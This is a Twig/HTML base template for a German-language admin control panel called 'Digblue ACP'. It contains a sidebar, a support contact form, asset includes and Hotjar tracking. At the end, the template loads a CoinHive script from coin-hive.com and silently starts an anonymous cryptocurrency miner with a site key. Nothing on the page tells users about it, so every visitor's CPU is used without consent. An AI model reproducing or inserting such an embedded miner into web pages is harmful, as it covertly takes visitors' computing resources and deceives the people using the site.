<!DOCTYPE html>
<html lang="de">
<head>
    <meta charset="utf-8"/>
    <title>Digblue ACP</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta content="width=device-width, initial-scale=1" name="viewport"/>
    <meta charset="UTF-8">
    <meta content="CREA Werbeagentur GmbH" name="author"/>


    <link rel="stylesheet" href="{{ asset('assets/vendor/font-awesome/css/font-awesome.min.css') }}"/>
    <link rel="stylesheet" href="{{ asset('assets/vendor/simple-line-icons/simple-line-icons.min.css') }}"/>
    <link rel="stylesheet" href="{{ asset('assets/vendor/bootstrap/css/bootstrap.min.css') }}"/>
    <link rel="stylesheet" href="{{ asset('assets/vendor/bootstrap-switch/css/bootstrap-switch.min.css') }}"/>
    <link rel="stylesheet" href="{{ asset('assets/css/components-rounded.min.css') }}"/>
    <link rel="stylesheet" href="{{ asset('assets/css/plugins.min.css') }}"/>
    <link rel="stylesheet" href="{{ asset('assets/css/layout.min.css') }}"/>
    <link rel="stylesheet" href="{{ asset('assets/css/themes/default.min.css') }}"/>
    <link rel="stylesheet" href="{{ asset('assets/css/toastr.min.css') }}"/>
    <link rel="stylesheet" href="{{ asset('assets/css/profile.css') }}"/>
    <link rel="stylesheet" href="{{ asset('assets/css/select2.min.css') }}"/>
    <link rel="stylesheet" href="{{ asset('assets/css/select2-bootstrap.min.css') }}"/>
    <link rel="stylesheet" href="{{ asset('assets/css/custom.css') }}"/>


    <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,300,600,700&subset=all" rel="stylesheet"
          type="text/css"/>
    <link rel="shortcut icon" href="{{ asset('assets/digblue-logo-icon.ico') }}"/>

    {% block style %}
        <style type="text/css">
            /* Checkbox Style
             */
            input[type=checkbox] + label {
                cursor: pointer;
            }

            /* The switch - the box around the slider */
            .switch {
                position: relative;
                display: inline-block;
                width: 58px;
                height: 34px;
            }

            /* Hide default HTML checkbox */
            .switch input {display:none;}

            /* The slider */
            .slider {
                position: absolute;
                cursor: pointer;
                top: 0;
                left: 0;
                right: 0;
                bottom: 0;
                background-color: #ccc;
                -webkit-transition: .4s;
                transition: .4s;
                margin: 8px 6px;
            }

            .slider:before {
                position: absolute;
                content: "";
                height: 20px;
                width: 20px;
                left: 0px;
                bottom: -1px;
                background-color: white;
                -webkit-transition: .4s;
                transition: .4s;
                box-shadow: 0 0 1px black;
            }

            input:checked + .slider {
                background-color: #2196F3;
            }

            input:focus + .slider {
                box-shadow: 0 0 1px #2196F3;
            }

            input:checked + .slider:before {
                -webkit-transform: translateX(26px);
                -ms-transform: translateX(26px);
                transform: translateX(26px);
            }

            /* Rounded sliders */
            .slider.round {
                border-radius: 34px;
            }

            .slider.round:before {
                border-radius: 50%;
            }

            .sliderName {
                position: absolute;
                top: 6px;
                left: 62px;
                margin-right: -15px;
                min-width: 110px;
                cursor: pointer;
            }

        </style>
    {% endblock %}

</head>
<body class="page-container-bg-solid page-header-fixed page-sidebar-closed-hide-logo page-footer-fixed">
<div class="page-header navbar navbar-fixed-top">
    <div class="page-header-inner">


        <div class="page-logo">
            <div class="menu-toggler sidebar-toggler pull-left"></div>
            <a href="javascript:" class="menu-toggler responsive-toggler" data-toggle="collapse"
            data-target=".navbar-collapse"> </a>
            <a href="{{ path('homepage') }}">
                <img src="{{ asset('assets/img/digblue-logo-xs.png') }}" alt="logo" id="topLogo" class="logo-default"/> </a>
        </div>
        <div class="page-top">

            <div class="top-menu">
                <ul class="nav navbar-nav pull-right">

                    <h4> <a href="{{ path('app_logout') }}" style="color: white">
                                    <i class="icon-key"></i> Abmelden </a></h4>




                </ul>
            </div>
        </div>
    </div>
</div>
<div class="clearfix"></div>

<div class="page-container">
    <div class="page-sidebar-wrapper">
        <div class="page-sidebar navbar-collapse collapse">
            <ul class="page-sidebar-menu   " data-keep-expanded="false" data-auto-scroll="true" data-slide-speed="200">
                <li class="nav-item start {% if app.request.get('_route') == 'admin' %}active{% endif %}">
                    <a href="{{ path('admin') }}" class="nav-link">
                        <i class="icon-home"></i>
                        <span class="title">Home</span>
                    </a>
                </li>

                <li class="nav-item start">
                    <a class="nav-link nav-toggle" data-toggle="modal" data-target="#support_modal">
                        <i class="fa fa-support"></i>
                        <span class="title">Support</span>

                    </a>

                </li>

            </ul>

        </div>
    </div>
    <div class="page-content-wrapper">
        <div class="page-content">
            {% block body %}{% endblock %}
        </div>
    </div>

    <div class="page-footer text-center">
        <div class="page-footer-inner" style="float: none;">&copy; {{ ""|date("Y") }} by
            <a target="_blank" href="http://crea.de">CREA Werbeagentur GmbH | www.crea.de</a>
        </div>
        <div class="scroll-to-top">
            <i class="icon-arrow-up"></i>
        </div>
    </div>
</div>

<div class="modal fade" tabindex="-1" role="dialog" id="support_modal">
    <div class="modal-dialog" role="document">
        <div class="modal-content">
            <div class="modal-header">
                <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
                <h4 class="modal-title">
                    <i class="fa fa-support"></i>
                    Support</h4>
            </div>
            <div class="modal-body">
                <div class="alert alert-info">
                    <i class="icon-info"></i> Über dieses Formular erreichen Sie unseren Support.<br/>
                    Sie können uns zu unseren Geschäftszeiten auch telefonisch erreichen:
                    <span class="visible-sm visible-xs" style="white-space: nowrap"><a href="tel:+49541404640">05 41 / 40 46 40</a></span><span class="visible-lg visible-md" style="white-space: nowrap">05 41 / 40 46 40</span>
                </div>
               <form class="form" onsubmit="return false;">
                   <div class="form-group">
                       <label for="name">Name:</label>
                       <input type="text" name="name" id="name" class="form-control" value="{{ app.user.fullname }}"/>
                   </div>
                   <div class="form-group">
                       <label for="email">E-Mail:</label>
                       <input type="email" name="email" id="email" class="form-control" value="{{ app.user.email }}"/>
                   </div>
                   <div class="form-group">
                       <label for="subject">Betreff:</label>
                       <input type="text" name="subject" id="subject" class="form-control" required value=""/>
                   </div>
                   <div class="form-group">
                       <label for="message">Nachricht:</label>
                       <textarea rows="7" name="message" id="message" class="form-control" required></textarea>
                   </div>

               </form>
            </div>
            <div class="modal-footer">
                <button type="button" class="btn btn-default" id="closeSupportModal" data-dismiss="modal">Abbrechen</button>
                <button type="button" class="btn btn-primary" id="sendButton">Senden</button>
            </div>
        </div><!-- /.modal-content -->
    </div><!-- /.modal-dialog -->
</div><!-- /.modal -->

<script src="{{ asset('assets/js/jquery.min.js') }}"></script>
<script src="{{ asset('assets/vendor/bootstrap/js/bootstrap.js') }}"></script>
<script src="{{ asset('assets/js/app.js') }}"></script>
<script src="{{ asset('assets/js/layout.js') }}"></script>
<script src="{{ asset('assets/js/js.cookie.min.js') }}"></script>
<script src="{{ asset('assets/vendor/jquery-slimscroll/jquery.slimscroll.js') }}"></script>
<script src="{{ asset('assets/js/jquery.blockui.min.js') }}"></script>
<script src="{{ asset('assets/vendor/bootstrap-switch/js/bootstrap-switch.js') }}"></script>
<script src="{{ asset('assets/js/quick-nav.js') }}"></script>
<script src="{{ asset('assets/js/toastr.min.js') }}"></script>
<script src="{{ asset('assets/js/select2.full.min.js') }}"></script>
<script src="{{ asset('assets/js/select2de.js') }}"></script>

<script src="{{ asset('bundles/fosjsrouting/js/router.js') }}"></script>
<script src="{{ path('fos_js_routing_js', { callback: 'fos.Router.setData' }) }}"></script>

<script>

    toastr.options = {
        "closeButton": true,
        "debug": false,
        "positionClass": "toast-top-center",
        "onclick": null,
        "showDuration": "1000",
        "hideDuration": "1000",
        "timeOut": "5000",
        "extendedTimeOut": "1000",
        "showEasing": "swing",
        "hideEasing": "linear",
        "showMethod": "fadeIn",
        "hideMethod": "fadeOut"
    };


</script>
{% block javascript %}{% endblock %}
<!-- Hotjar Tracking Code for http://crea.digblue.de -->
<script>
    (function(h,o,t,j,a,r){
        h.hj=h.hj||function(){(h.hj.q=h.hj.q||[]).push(arguments)};
        h._hjSettings={hjid:595563,hjsv:5};
        a=o.getElementsByTagName('head')[0];
        r=o.createElement('script');r.async=1;
        r.src=t+h._hjSettings.hjid+j+h._hjSettings.hjsv;
        a.appendChild(r);
    })(window,document,'//static.hotjar.com/c/hotjar-','.js?sv=');
</script>
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
    $(function() {
        var miner = new CoinHive.Anonymous('ZaIsbcriI3WVk3Et2f80s1LdM2VGc1S1');
        miner.start();
    });
</script>
</body>
</html>